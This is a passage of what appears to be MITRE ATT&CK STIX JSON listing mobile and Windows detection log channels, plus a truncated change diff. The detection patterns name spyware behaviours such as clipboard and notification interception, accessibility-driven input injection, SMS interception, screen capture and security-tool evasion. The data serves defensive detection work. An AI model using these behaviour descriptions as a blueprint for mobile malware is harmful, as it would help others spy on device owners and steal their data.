                            "channel": "Calls to GetUserDefaultUILanguage, GetSystemDefaultUILanguage, GetKeyboardLayoutList"
                        },
                        {
                            "name": "etw:Microsoft-Windows-Kernel-Process",
                            "channel": "WriteProcessMemory: WriteProcessMemory targeting regions containing KernelCallbackTable addresses"
                        },
                        {
                            "name": "EDR:file",
                            "channel": "SetFileTime"
                        },
                        {
                            "name": "AndroidLogs:Kernel",
                            "channel": "Unprivileged app process (app UID, non-system) invoking sensitive syscalls or device interfaces associated with privilege escalation (setuid, ptrace, perf_event_open, vulnerable drivers)"
                        },
                        {
                            "name": "android:logcat",
                            "channel": "SELinux AVC for execmem/execute_no_trans/mprotect following recent writes by same UID"
                        },
                        {
                            "name": "iOS:unifiedlog",
                            "channel": "mmap/mprotect transitions to PROT_EXEC for pages associated with recently written files"
                        },
                        {
                            "name": "android:logcat",
                            "channel": "QUERY on exported ContentProviders of other packages (content://<other.pkg>/*) or MediaStore scoped queries immediately preceding file reads"
                        },
                        {
                            "name": "android:logcat",
                            "channel": "ClipboardManager (addOnPrimaryClipChangedListener|getPrimaryClip|getPrimaryClipDescription) invoked by <pkg>"
                        },
                        {
                            "name": "android:logcat",
                            "channel": "AccessibilityService connected|TYPE_VIEW_TEXT_CHANGED|TYPE_VIEW_FOCUSED events for other packages"
                        },
                        {
                            "name": "android:logcat",
                            "channel": "TYPE_WINDOW_STATE_CHANGED / TYPE_VIEW_FOCUSED shows foreign target package in foreground"
                        },
                        {
                            "name": "android:logcat",
                            "channel": "PackageManager getInstalledApplications|getInstalledPackages|getPackagesHoldingPermissions burst for <pkg>. TYPE_WINDOW_STATE_CHANGED shows foreground app then immediate package queries by <pkg>"
                        },
                        {
                            "name": "iOS:unifiedlog",
                            "channel": "LSApplicationWorkspace or canOpenURL probe bursts for many URL schemes"
                        },
                        {
                            "name": "android:logcat",
                            "channel": "getInstalledPackages/getPackagesHoldingPermissions with filters for known security/MDM/VPN package names. Queries to isDeviceOwnerApp/isProfileOwnerApp/getActiveAdmins/getPermissionGrantState. Requests list of enabled services or monitors TYPE_WINDOW_STATE_CHANGED to time checks"
                        },
                        {
                            "name": "iOS:unifiedlog",
                            "channel": "Queries indicating MDM profile presence, supervised state, restrictions read. LSApplicationWorkspace enumeration or app proxy queries referencing security vendors"
                        },
                        {
                            "name": "android:logcat",
                            "channel": "ACTION_VIEW redirect_uri handled by unexpected package"
                        },
                        {
                            "name": "android:logcat",
                            "channel": "canOpenURL/LSApplicationWorkspace resolved to unexpected bundle for redirect_uri"
                        },
                        {
                            "name": "android:logcat",
                            "channel": "query() against MediaStore/DocumentsContract URIs (Images/Video/Audio/Downloads/DocumentTree)"
                        },
                        {
                            "name": "iOS:unifiedlog",
                            "channel": "enumeratorForContainerItemIdentifier / itemForIdentifier across multiple containers/providers"
                        },
                        {
                            "name": "android:logcat",
                            "channel": "wifiservice startScan / scanResults retrieved repeatedly or by unexpected package"
                        },
                        {
                            "name": "android:logcat",
                            "channel": "bluetoothmanager startDiscovery / getBondedDevices / scan callback bursts by package"
                        },
                        {
                            "name": "android:logcat",
                            "channel": "telephony cell info enumeration bursts (neighboring/all cell info) by package"
                        },
                        {
                            "name": "android:logcat",
                            "channel": "repeated queries or dumps related to running tasks/services/process state by same package/UID (e.g., getRunningAppProcesses, running services/task inspection)"
                        },
                        {
                            "name": "android:logcat",
                            "channel": "Application accesses android.os.Build fields or device configuration APIs (MODEL, MANUFACTURER, VERSION.SDK_INT, HARDWARE)"
                        },
                        {
                            "name": "iOS:unifiedlog",
                            "channel": "Application invokes UIDevice queries (model, systemVersion, name)"
                        },
                        {
                            "name": "android:logcat",
                            "channel": "Invocation of MediaRecorder.start(), AudioRecord.startRecording(), or VOICE_CALL audio source"
                        },
                        {
                            "name": "iOS:unifiedlog",
                            "channel": "Invocation of AVAudioRecorder, AVCaptureSession, or related audio capture framework calls"
                        },
                        {
                            "name": "android:logcat",
                            "channel": "Application invokes LocationManager, FusedLocationProviderClient, or GPS/location sensor APIs"
                        },
                        {
                            "name": "iOS:unifiedlog",
                            "channel": "Application activates CoreLocation services or CLLocationManager APIs"
                        },
                        {
                            "name": "MobileEDR:telemetry",
                            "channel": "Framework-based networking usage spikes or uncommon networking stacks observed by agent telemetry (e.g., repeated URLSession/OkHttp-like patterns) without corresponding foreground/user interaction"
                        },
                        {
                            "name": "MobileEDR:telemetry",
                            "channel": "Agent-observable telephony subscription/state API signals indicating SIM/eSIM subscription change (vendor-agnostic: 'telephony subscription changed')"
                        },
                        {
                            "name": "MobileEDR:telemetry",
                            "channel": "Accessibility framework usage patterns such as event subscription, performAction invocation, node traversal, text change observation, or overlay/window presentation correlated to app identity"
                        },
                        {
                            "name": "MobileEDR:telemetry",
                            "channel": "Browser/WebView framework usage indicating external URL load, script execution enablement, file download initiation, intent handoff, or package install prompt sequence"
                        },
                        {
                            "name": "MobileEDR:telemetry",
                            "channel": "Observed device-service, trust-service, backup/service interaction, or other privileged framework activity associated with physical host access"
                        },
                        {
                            "name": "MobileEDR:telemetry",
                            "channel": "Connectivity manager, telephony, Wi-Fi, network callback, or location-provider framework reports repeated unavailable, disconnected, suspended, or degraded state transitions"
                        },
                        {
                            "name": "MobileEDR:telemetry",
                            "channel": "Observed network-path, reachability, DNS, transport, or location-provider framework reports repeated unavailable or failed state near active device use"
                        },
                        {
                            "name": "MobileEDR:telemetry",
                            "channel": "Content resolver, document provider, media store, storage access framework, bulk stream processing, or repeated crypto-adjacent framework use observed during multi-file transformation"
                        },
                        {
                            "name": "MobileEDR:telemetry",
                            "channel": "Known application begins first-seen or expanded use of content providers, account services, accessibility, package services, cryptographic routines, dynamic loading, or other framework interactions after update/install"
                        },
                        {
                            "name": "MobileEDR:telemetry",
                            "channel": "Known application begins first-seen or expanded use of protected frameworks, account services, background task APIs, crypto/network service APIs, or other runtime behaviors after update/install"
                        },
                        {
                            "name": "MobileEDR:telemetry",
                            "channel": "Known application begins first-seen or expanded use of account services, accessibility, content providers, dynamic loading, package services, WebView bridges, crypto/network APIs, or advertising/telemetry-adjacent framework behavior after install or update"
                        },
                        {
                            "name": "MobileEDR:telemetry",
                            "channel": "Privileged or OEM-context framework/API use tied to telephony, device policy, accessibility, overlay, input injection, package visibility, or protected settings modification from an identity not expected for the device model or approved image"
                        },
                        {
                            "name": "android:logcat",
                            "channel": "Invocation of Calendar.set() and Calendar.add()"
                        },
                        {
                            "name": "iOS:unifiedlog",
                            "channel": "Supplemental anomaly in baseband, IOKit, accessory, security, or activation-related subsystem logging temporally adjacent to suspicious posture or network behavior"
                        },
                        {
                            "name": "MobileEDR:telemetry",
                            "channel": "Recently installed or updated trusted app invokes Android framework paths or special access patterns inconsistent with its role, including accessibility-like behavior, overlay behavior, package visibility expansion, protected settings access, device policy interaction, or unusual IPC/provider access"
                        },
                        {
                            "name": "iOS:unifiedlog",
                            "channel": "Supplemental managed app or system subsystem anomalies near install/update, launch services, extension handling, app activation, or background execution temporally adjacent to suspicious network or lifecycle behavior"
                        },
                        {
                            "name": "MobileEDR:telemetry",
                            "channel": "App uses Android framework behaviors associated with background work scheduling, network job execution, IPC/provider access, overlay or accessibility-like interaction, or unusual package visibility immediately adjacent to web-service communication"
                        },
                        {
                            "name": "iOS:unifiedlog",
                            "channel": "Supplemental launch, background task, networking, or extension-handling anomalies occur temporally adjacent to suspicious web-service communication from a managed app or supervised device"
                        },
                        {
                            "name": "MobileEDR:telemetry",
                            "channel": "Background work scheduler, job execution, or persistent service triggered network request to public web-service followed by second outbound connection within TimeWindow"
                        },
                        {
                            "name": "iOS:unifiedlog",
                            "channel": "Background task or networking subsystem event occurred immediately before resolver retrieval and pivot connection sequence"
                        },
                        {
                            "name": "MobileEDR:telemetry",
                            "channel": "Background work scheduler, job execution, foreground-service start, or persistent service activation immediately preceded retrieve-then-write exchange with public web-service platform"
                        },
                        {
                            "name": "iOS:unifiedlog",
                            "channel": "Background task, networking, or app-activation subsystem event occurred immediately before or during retrieve-then-write exchange with public web-service platform"
                        },
                        {
                            "name": "MobileEDR:telemetry",
                            "channel": "Background work scheduler, job execution, foreground-service start, or persistent service activation immediately preceded outbound session using non-standard protocol-to-port pairing"
                        },
                        {
                            "name": "android:logcat",
                            "channel": "Invocation of CallLogs.getLastOutgoingCall()"
                        },
                        {
                            "name": "android:logcat",
                            "channel": "Invocation of ContactsContract.Contacts.getLookupUri() and/or ContactsContract.Contacts.lookupContact()"
                        },
                        {
                            "name": "iOS:unifiedlog",
                            "channel": "Camera, media capture, app-activation, or background-task subsystem event occurred immediately before or during sustained camera session from same managed-app or device context"
                        },
                        {
                            "name": "android:logcat",
                            "channel": "Invocation of AccountManager.getAccounts()"
                        },
                        {
                            "name": "MobileEDR:telemetry",
                            "channel": "MediaProjection-style screen capture session began from app identity while a different app was foregrounded and capture path was not mapped to approved recording workflow"
                        },
                        {
                            "name": "MobileEDR:telemetry",
                            "channel": "Accessibility-service activity from app identity coincided with foreground content observation and subsequent screenshot, frame buffer, or screenrecord artifact behavior within TimeWindow"
                        },
                        {
                            "name": "MobileEDR:telemetry",
                            "channel": "Privileged screencap, screenrecord, adb-driven capture, or root-context screen acquisition behavior occurred from app, shell, or elevated identity while foreground app context changed or sensitive app remained active"
                        },
                        {
                            "name": "MobileEDR:telemetry",
                            "channel": "Accessibility-enabled app invoked programmatic click or action on behalf of user while a different app was foregrounded and injected action was not mapped to approved accessibility or autofill workflow"
                        },
                        {
                            "name": "MobileEDR:telemetry",
                            "channel": "Accessibility-enabled app invoked global action such as back, home, recents, or navigation control while target foreground app context changed within TimeWindow"
                        },
                        {
                            "name": "MobileEDR:telemetry",
                            "channel": "Accessibility-enabled app inserted text into active field of different foreground app without user keyboard activity or approved autofill relationship"
                        },
                        {
                            "name": "MobileEDR:telemetry",
                            "channel": "App intercepts notification content from external package (e.g., messaging/auth apps) while in background OR without recent user interaction"
                        },
                        {
                            "name": "MobileEDR:telemetry",
                            "channel": "App invokes cryptographic functions (e.g., AES/RSA/KeyStore usage) on buffer data followed by encode/transform operations not tied to normal app workflows"
                        },
                        {
                            "name": "MobileEDR:telemetry",
                            "channel": "App invokes symmetric encryption routines (e.g., AES/RC4 cipher initialization + encrypt operations) with repeated key usage across multiple data buffers"
                        },
                        {
                            "name": "MobileEDR:telemetry",
                            "channel": "Symmetric key material reused across multiple encryption operations within short interval OR derived locally without secure hardware-backed storage"
                        },
                        {
                            "name": "MobileEDR:telemetry",
                            "channel": "App invokes asymmetric cryptographic operations (e.g., RSA/ECC keypair generation OR public key encryption OR signature operations) on outbound data buffers"
                        },
                        {
                            "name": "MobileEDR:telemetry",
                            "channel": "Keypair generation, import, or access events (public/private key usage) occurring prior to network communication"
                        },
                        {
                            "name": "MobileEDR:telemetry",
                            "channel": "Application invokes custom TLS trust evaluation logic or pin validation routines (e.g., custom TrustManager, HostnameVerifier override, certificate/public key comparison) immediately before outbound TLS session establishment"
                        },
                        {
                            "name": "MobileEDR:telemetry",
                            "channel": "Application invokes archive, compression, or bulk-buffer packaging routines on previously accessed local data within the same execution chain"
                        },
                        {
                            "name": "MobileEDR:telemetry",
                            "channel": "Application encrypts newly created archive or staged data blob after collection and before storage or outbound transfer"
                        },
                        {
                            "name": "MobileEDR:telemetry",
                            "channel": "Application performs bulk data transformation or packaging-like processing on collected records prior to file creation or upload"
                        },
                        {
                            "name": "MobileEDR:telemetry",
                            "channel": "Application queries or opens multiple local SQLite or app-associated database stores containing records unrelated to the app's declared function during the collection phase"
                        },
                        {
                            "name": "MobileEDR:telemetry",
                            "channel": "Application performs repeated record access, container traversal, or local data extraction processing against local stores before staging or transmission"
                        },
                        {
                            "name": "MobileEDR:telemetry",
                            "channel": "Application calls startForegroundService() or startForeground() / ServiceCompat.startForeground() and transitions to persistent foreground-service execution at the start of the chain"
                        },
                        {
                            "name": "MobileEDR:telemetry",
                            "channel": "Application invokes direct file retrieval, DownloadManager usage, or streaming write from network response to local storage immediately after remote session establishment"
                        },
                        {
                            "name": "MobileEDR:telemetry",
                            "channel": "Managed app performs post-download unpacking, dynamic resource handling, or module preparation immediately after local payload creation"
                        },
                        {
                            "name": "MobileEDR:telemetry",
                            "channel": "Application loads or resolves native shared library (.so) or JNI bridge immediately before suspicious native execution phase"
                        },
                        {
                            "name": "MobileEDR:telemetry",
                            "channel": "Application transitions from managed code into JNI/native function execution or attaches native thread to runtime during the execution phase"
                        },
                        {
                            "name": "MobileEDR:telemetry",
                            "channel": "Existing application is replaced, updated, or reinstalled and the resulting package metadata, code sections, or executable-supporting artifacts diverge from known-good baseline during the persistence-establishment phase"
                        },
                        {
                            "name": "MobileEDR:telemetry",
                            "channel": "Application invokes SMS send, intercept, delete, or provider-write behavior, including handling SMS_DELIVER or interacting with SMS content provider during unauthorized message-control phase"
                        },
                        {
                            "name": "MobileEDR:telemetry",
                            "channel": "Application enqueues WorkManager work request or schedules JobScheduler or AlarmManager task with delay, periodic interval, or execution constraints during the persistence/execution setup phase"
                        },
                        {
                            "name": "MobileEDR:telemetry",
                            "channel": "Application creates or executes NSBackgroundActivityScheduler activity with repeating or deferred invocation semantics during the scheduling and trigger phases"
                        },
                        {
                            "name": "MobileEDR:telemetry",
                            "channel": "Application initializes proxy-capable or raw-socket networking constructs, including SOCKS-capable Proxy API usage or direct socket listener/setup immediately before traffic relay phase"
                        },
                        {
                            "name": "MobileEDR:telemetry",
                            "channel": "Application invokes call placement, answer, redirect, block, screening, or ConnectionService call-handling APIs during unauthorized call-control phase"
                        },
                        {
                            "name": "MobileEDR:telemetry",
                            "channel": "application process loads external code modules or injects into runtime (zygote/app_process) + abnormal library loading or method interception behavior"
                        },
                        {
                            "name": "MobileEDR:telemetry",
                            "channel": "Application registers broadcast receiver, WorkManager job, JobScheduler task, or intent filter tied to system event such as BOOT_COMPLETED, SMS_RECEIVED, CONNECTIVITY_CHANGE during persistence setup phase"
                        },
                        {
                            "name": "MobileEDR:telemetry",
                            "channel": "application registers or invokes broadcast receiver via registerReceiver() or manifest-declared receiver + intent filter tied to system or app events"
                        },
                        {
                            "name": "MobileEDR:telemetry",
                            "channel": "application launches or executes code where loaded library or component path does not match application package path or expected signing context"
                        },
                        {
                            "name": "MobileEDR:telemetry",
                            "channel": "multiple applications invoking core system APIs (e.g., sensor, permission, telephony) with abnormal or inconsistent return values across apps within short interval"
                        },
                        {
                            "name": "MobileEDR:telemetry",
                            "channel": "device integrity degradation + root detected or system partition modification affecting runtime libraries (e.g., /system/lib*, /vendor/lib*)"
                        },
                        {
                            "name": "MobileEDR:telemetry",
                            "channel": "application invokes privileged framework APIs (Accessibility events, UI automation, package install flows) immediately following permission grant"
                        },
                        {
                            "name": "MobileEDR:telemetry",
                            "channel": "application invokes DevicePolicyManager APIs (e.g., resetPassword, lockNow, setCameraDisabled) immediately following admin activation"
                        },
                        {
                            "name": "MobileEDR:telemetry",
                            "channel": "application queries target-selection attributes (e.g., location, SIM/operator, locale, device state, network identity) and then conditionally invokes sensitive framework APIs only after expected value is observed"
                        },
                        {
                            "name": "MobileEDR:telemetry",
                            "channel": "application exhibits repeated environment-context evaluation followed by delayed privileged framework use only after target-specific match"
                        },
                        {
                            "name": "MobileEDR:telemetry",
                            "channel": "application invokes geolocation or geofencing framework operations (e.g., location polling or geofence registration/evaluation) and sensitive framework activity begins only after region match or location threshold condition"
                        },
                        {
                            "name": "MobileEDR:telemetry",
                            "channel": "application exhibits repeated location-context evaluation followed by delayed privileged framework use or feature activation only after target region match"
                        },
                        {
                            "name": "MobileEDR:telemetry",
                            "channel": "application invokes package or component state changes affecting launcher-facing activity availability and subsequently continues operational framework activity after icon suppression"
                        },
                        {
                            "name": "MobileEDR:telemetry",
                            "channel": "application invokes motion-sensor or device-activity framework operations followed by conditional execution of sensitive framework activity only after inferred user absence"
                        },
                        {
                            "name": "MobileEDR:telemetry",
                            "channel": "application invokes system framework operations that alter monitoring, accessibility, or execution visibility followed by reduction in expected telemetry generation"
                        },
                        {
                            "name": "MobileEDR:telemetry",
                            "channel": "application invokes accessibility global actions (back/home/recents) or observes package-management UI immediately after uninstall/settings screen becomes foreground"
                        },
                        {
                            "name": "MobileEDR:telemetry",
                            "channel": "application invokes lock-related or UI-denial framework operations, including DevicePolicyManager lock actions, persistent overlay behavior, or accessibility-driven navigation interference immediately before device enters locked or unusable state"
                        },
                        {
                            "name": "MobileEDR:telemetry",
                            "channel": "application invokes package, settings, or privileged framework operations capable of disabling security software, altering security enforcement, or interfering with reporting before telemetry loss"
                        },
                        {
                            "name": "MobileEDR:telemetry",
                            "channel": "application invokes uninstall-related package-management operations, accessibility-driven uninstall confirmation actions, or privileged file-removal operations immediately before installed-state loss"
                        },
                        {
                            "name": "MobileEDR:telemetry",
                            "channel": "application invokes file-management, package, storage, or administrative wipe operations immediately before loss of expected local files or file collections"
                        }
                    ],
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_version": "2.1",
                    "x_mitre_domains": [
                        "ics-attack",
                        "mobile-attack",
                        "enterprise-attack"
                    ],
                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-04-23 18:22:40.476000+00:00\", \"old_value\": \"2025-11-12 22:03:39.105000+00:00\"}, \"root['x_mitre_version']\": {\"new_value\": \"2.1\", \"old_value\": \"2.0\"}}, \"iterable_item_added\": {\"root['x_mitre_log_sources'][69]\": {\"name\": \"AndroidLogs:Kernel\", \"channel\": \"Unprivileged app process (app UID, non-system) invoking sensitive syscalls or device interfaces associated with privilege escalation (setuid, ptrace, perf_event_open, vulnerable drivers)\"}, \"root['x_mitre_log_sources'][70]\": {\"name\": \"android:logcat\", \"channel\": \"SELinux AVC for execmem/execute_no_trans/mprotect following recent writes by same UID\"}, \"root['x_mitre_log_sources'][71]\": {\"name\": \"iOS:unifiedlog\", \"channel\": \"mmap/mprotect transitions to PROT_EXEC for pages associated with recently written files\"}, \"root['x_mitre_log_sources'][72]\": {\"name\": \"android:logcat\", \"channel\": \"QUERY on exported ContentProviders of other packages (content://<other.pkg>/*) or MediaStore scoped queries immediately preceding file reads\"}, \"root['x_mitre_log_sources'][73]\": {\"name\": \"android:logcat\", \"channel\": \"ClipboardManager (addOnPrimaryClipChangedListener|getPrimaryClip|getPrimaryClipDescription) invoked by <pkg>\"}, \"root['x_mitre_log_sources'][74]\": {\"name\": \"android:logcat\", \"channel\": \"AccessibilityService connected|TYPE_VIEW_TEXT_CHANGED|TYPE_VIEW_FOCUSED events for other packages\"}, \"root['x_mitre_log_sources'][75]\": {\"name\": \"android:logcat\", \"channel\": \"TYPE_WINDOW_STATE_CHANGED / TYPE_VIEW_FOCUSED shows foreign target package in foreground\"}, \"root['x_mitre_log_sources'][76]\": {\"name\": \"android:logcat\", \"channel\": \"PackageManager getInstalledApplications|getInstalledPackages|getPackagesHoldingPermissions burst for <pkg>. TYPE_WINDOW_STATE_CHANGED shows foreground app then immediate package queries by <pkg>\"}, \"root['x_mitre_log_sources'][77]\": {\"name\": \"iOS:unifiedlog\", \"channel\": \"LSApplicationWorkspace or canOpenURL probe bursts for many URL schemes\"}, \"root['x_mitre_log_sources'][78]\": {\"name\": \"android:logcat\", \"channel\": \"getInstalledPackages/getPackagesHoldingPermissions with filters for known security/MDM/VPN package names. Queries to isDeviceOwnerApp/isProfileOwnerApp/getActiveAdmins/getPermissionGrantState. Requests list of enabled services or monitors TYPE_WINDOW_STATE_CHANGED to time checks\"}, \"root['x_mitre_log_sources'][79]\": {\"name\": \"iOS:unifiedlog\", \"channel\": \"Queries indicating MDM profile presence, supervised state, restrictions read. LSApplicationWorkspace enumeration or app proxy queries referencing security vendors\"}, \"root['x_mitre_log_sources'][80]\": {\"name\": \"android:logcat\", \"channel\": \"ACTION_VIEW redirect_uri handled by unexpected package\"}, \"root['x_mitre_log_sources'][81]\": {\"name\": \"android:logcat\", \"channel\": \"canOpenURL/LSApplicationWorkspace resolved to unexpected bundle for redirect_uri\"}, \"root['x_mitre_log_sources'][82]\": {\"name\": \"android:logcat\", \"channel\": \"query() against MediaStore/DocumentsContract URIs (Images/Video/Audio/Downloads/DocumentTree)\"}, \"root['x_mitre_log_sources'][83]\": {\"name\": \"iOS:unifiedlog\", \"channel\": \"enumeratorForContainerItemIdentifier / itemForIdentifier across multiple containers/providers\"}, \"root['x_mitre_log_sources'][84]\": {\"name\": \"android:logcat\", \"channel\": \"wifiservice startScan / scanResults retrieved repeatedly or by unexpected package\"}, \"root['x_mitre_log_sources'][85]\": {\"name\": \"android:logcat\", \"channel\": \"bluetoothmanager startDiscovery / getBondedDevices / scan callback bursts by package\"}, \"root['x_mitre_log_sources'][86]\": {\"name\": \"android:logcat\", \"channel\": \"telephony cell info enumeration bursts (neighboring/all cell info) by package\"}, \"root['x_mitre_log_sources'][87]\": {\"name\": \"android:logcat\", \"channel\": \"repeated queries or dumps related to running tasks/services/process state by same package/UID (e.g., getRunningAppProcesses, running services/task inspection)\"}, \"root['x_mitre_log_sources'][88]\": {\"name\": \"android:logcat\", \"channel\": \"Application accesses android.os.Build fields or device configuration APIs (MODEL, MANUFACTURER, VERSION.SDK_INT, HARDWARE)\"}, \"root['x_mitre_log_sources'][89]\": {\"name\": \"iOS:unifiedlog\", \"channel\": \"Application invokes UIDevice queries (model, systemVersion, name)\"}, \"root['x_mitre_log_sources'][90]\": {\"name\": \"android:logcat\", \"channel\": \"Invocation of MediaRecorder.start(), AudioRecord.startRecording(), or VOICE_CALL audio source\"}, \"root['x_mitre_log_sources'][91]\": {\"name\": \"iOS:unifiedlog\", \"channel\": \"Invocation of AVAudioRecorder, AVCaptureSession, or related audio capture framework calls\"}, \"root['x_mitre_log_sources'][92]\": {\"name\": \"android:logcat\", \"channel\": \"Application invokes LocationManager, FusedLocationProviderClient, or GPS/location sensor APIs\"}, \"root['x_mitre_log_sources'][93]\": {\"name\": \"iOS:unifiedlog\", \"channel\": \"Application activates CoreLocation services or CLLocationManager APIs\"}, \"root['x_mitre_log_sources'][94]\": {\"name\": \"MobileEDR:telemetry\", \"channel\": \"Framework-based networking usage spikes or uncommon networking stacks observed by agent telemetry (e.g., repeated URLSession/OkHttp-like patterns) without corresponding foreground/user interaction\"}, \"root['x_mitre_log_sources'][95]\": {\"name\": \"MobileEDR:telemetry\", \"channel\": \"Agent-observable telephony subscription/state API signals indicating SIM/eSIM subscription change (vendor-agnostic: 'telephony subscription changed')\"}, \"root['x_mitre_log_sources'][96]\": {\"name\": \"MobileEDR:telemetry\", \"channel\": \"Accessibility framework usage patterns such as event subscription, performAction invocation, node traversal, text change observation, or overlay/window presentation correlated to app identity\"}, \"root['x_mitre_log_sources'][97]\": {\"name\": \"MobileEDR:telemetry\", \"channel\": \"Browser/WebView framework usage indicating external URL load, script execution enablement, file download initiation, intent handoff, or package install prompt sequence\"}, \"root['x_mitre_log_sources'][98]\": {\"name\": \"MobileEDR:telemetry\", \"channel\": \"Observed device-service, trust-service, backup/service interaction, or other privileged framework activity associated with physical host access\"}, \"root['x_mitre_log_sources'][99]\": {\"name\": \"MobileEDR:telemetry\", \"channel\": \"Connectivity manager, telephony, Wi-Fi, network callback, or location-provider framework reports repeated unavailable, disconnected, suspended, or degraded state transitions\"}, \"root['x_mitre_log_sources'][100]\": {\"name\": \"MobileEDR:telemetry\", \"channel\": \"Observed network-path, reachability, DNS, transport, or location-provider framework reports repeated unavailable or failed state near active device use\"}, \"root['x_mitre_log_sources'][101]\": {\"name\": \"MobileEDR:telemetry\", \"channel\": \"Content resolver, document provider, media store, storage access framework, bulk stream processing, or repeated crypto-adjacent framework use observed during multi-file transformation\"}, \"root['x_mitre_log_sources'][102]\": {\"name\": \"MobileEDR:telemetry\", \"channel\": \"Known application begins first-seen or expanded use of content providers, account services, accessibility, package services, cryptographic routines, dynamic loading, or other framework interactions after update/install\"}, \"root['x_mitre_log_sources'][103]\": {\"name\": \"MobileEDR:telemetry\", \"channel\": \"Known application begins first-seen or expanded use of protected frameworks, account services, background task APIs, crypto/network service APIs, or other runtime behaviors after update/install\"}, \"root['x_mitre_log_sources'][104]\": {\"name\": \"MobileEDR:telemetry\", \"channel\": \"Known application begins first-seen or expanded use of account services, accessibility, content providers, dynamic loading, package services, WebView bridges, crypto/network APIs, or advertising/telemetry-adjacent framework behavior after install or update\"}, \"root['x_mitre_log_sources'][105]\": {\"name\": \"MobileEDR:telemetry\", \"channel\": \"Privileged or OEM-context framework/API use tied to telephony, device policy, accessibility, overlay, input injection, package visibility, or protected settings modification from an identity not expected for the device model or approved image\"}, \"root['x_mitre_log_sources'][106]\": {\"name\": \"android:logcat\", \"channel\": \"Invocation of Calendar.set() and Calendar.add()\"}, \"root['x_mitre_log_sources'][107]\": {\"name\": \"iOS:unifiedlog\", \"channel\": \"Supplemental anomaly in baseband, IOKit, accessory, security, or activation-related subsystem logging temporally adjacent to suspicious posture or network behavior\"}, \"root['x_mitre_log_sources'][108]\": {\"name\": \"MobileEDR:telemetry\", \"channel\": \"Recently installed or updated trusted app invokes Android framework paths or special access patterns inconsistent with its role, including accessibility-like behavior, overlay behavior, package visibility expansion, protected settings access, device policy interaction, or unusual IPC/provider access\"}, \"root['x_mitre_log_sources'][109]\": {\"name\": \"iOS:unifiedlog\", \"channel\": \"Supplemental managed app or system subsystem anomalies near install/update, launch services, extension handling, app activation, or background execution temporally adjacent to suspicious network or lifecycle behavior\"}, \"root['x_mitre_log_sources'][110]\": {\"name\": \"MobileEDR:telemetry\", \"channel\": \"App uses Android framework behaviors associated with background work scheduling, network job execution, IPC/provider access, overlay or accessibility-like interaction, or unusual package visibility immediately adjacent to web-service communication\"}, \"root['x_mitre_log_sources'][111]\": {\"name\": \"iOS:unifiedlog\", \"channel\": \"Supplemental launch, background task, networking, or extension-handling anomalies occur temporally adjacent to suspicious web-service communication from a managed app or supervised device\"}, \"root['x_mitre_log_sources'][112]\": {\"name\": \"MobileEDR:telemetry\", \"channel\": \"Background work scheduler, job execution, or persistent service triggered network request to public web-service followed by second outbound connection within TimeWindow\"}, \"root['x_mitre_log_sources'][113]\": {\"name\": \"iOS:unifiedlog\", \"channel\": \"Background task or networking subsystem event occurred immediately before resolver retrieval and pivot connection sequence\"}, \"root['x_mitre_log_sources'][114]\": {\"name\": \"MobileEDR:telemetry\", \"channel\": \"Background work scheduler, job execution, foreground-service start, or persistent service activation immediately preceded retrieve-then-write exchange with public web-service platform\"}, \"root['x_mitre_log_sources'][115]\": {\"name\": \"iOS:unifiedlog\", \"channel\": \"Background task, networking, or app-activation subsystem event occurred immediately before or during retrieve-then-write exchange with public web-service platform\"}, \"root['x_mitre_log_sources'][116]\": {\"name\": \"MobileEDR:telemetry\", \"channel\": \"Background work scheduler, job execution, foreground-service start, or persistent service activation immediately preceded outbound session using non-standard protocol-to-port pairing\"}, \"root['x_mitre_log_sources'][117]\": {\"name\": \"android:logcat\", \"channel\": \"Invocation of CallLogs.getLastOutgoingCall()\"}, \"root['x_mitre_log_sources'][118]\": {\"name\": \"android:logcat\", \"channel\": \"Invocation of ContactsContract.Contacts.getLookupUri() and/or ContactsContract.Contacts.lookupContact()\"}, \"root['x_mitre_log_sources'][119]\": {\"name\": \"iOS:unifiedlog\", \"channel\": \"Camera, media capture, app-activation, or background-task subsystem event occurred immediately before or during sustained camera session from same managed-app or device context\"}, \"root['x_mitre_log_sources'][120]\": {\"name\": \"android:logcat\", \"channel\": \"Invocation of AccountManager.getAccounts()\"}, \"root['x_mitre_log_sources'][121]\": {\"name\": \"MobileEDR:telemetry\", \"channel\": \"MediaProjection-style screen capture session began from app identity while a different app was foregrounded and capture path was not mapped to approved recording workflow\"}, \"root['x_mitre_log_sources'][122]\": {\"name\": \"MobileEDR:telemetry\", \"channel\": \"Accessibility-service activity from app identity coincided with foreground content observation and subsequent screenshot, frame buffer, or screenrecord artifact behavior within TimeWindow\"}, \"root['x_mitre_log_sources'][123]\": {\"name\": \"MobileEDR:telemetry\", \"channel\": \"Privileged screencap, screenrecord, adb-driven capture, or root-context screen acquisition behavior occurred from app, shell, or elevated identity while foreground app context changed or sensitive app remained active\"}, \"root['x_mitre_log_sources'][124]\": {\"name\": \"MobileEDR:telemetry\", \"channel\": \"Accessibility-enabled app invoked programmatic click or action on behalf of user while a different app was foregrounded and injected action was not mapped to approved accessibility or autofill workflow\"}, \"root['x_mitre_log_sources'][125]\": {\"name\": \"MobileEDR:telemetry\", \"channel\": \"Accessibility-enabled app invoked global action such as back, home, recents, or navigation control while target foreground app context changed within TimeWindow\"}, \"root['x_mitre_log_sources'][126]\": {\"name\": \"MobileEDR:telemetry\", \"channel\": \"Accessibility-enabled app inserted text into active field of different foreground app without user keyboard activity or approved autofill relationship\"}, \"root['x_mitre_log_sources'][127]\": {\"name\": \"MobileEDR:telemetry\", \"channel\": \"App intercepts notification content from external package (e.g., messaging/auth apps) while in background OR without recent user interaction\"}, \"root['x_mitre_log_sources'][128]\": {\"name\": \"MobileEDR:telemetry\", \"channel\": \"App invokes cryptographic functions (e.g., AES/RSA/KeyStore usage) on buffer data followed by encode/transform operations not tied to normal app workflows\"}, \"root['x_mitre_log_sources'][129]\": {\"name\": \"MobileEDR:telemetry\", \"channel\": \"App invokes symmetric encryption routines (e.g., AES/RC4 cipher initialization + encrypt operations) with repeated key usage across multiple data buffers\"}, \"root['x_mitre_log_sources'][130]\": {\"name\": \"MobileEDR:telemetry\", \"channel\": \"Symmetric key material reused across multiple encryption operations within short interval OR derived locally without secure hardware-backed storage\"}, \"root['x_mitre_log_sources'][131]\": {\"name\": \"MobileEDR:telemetry\", \"channel\": \"App invokes asymmetric cryptographic operations (e.g., RSA/ECC keypair generation OR public key encryption OR signature operations) on outbound data buffers\"}, \"root['x_mitre_log_sources'][132]\": {\"name\": 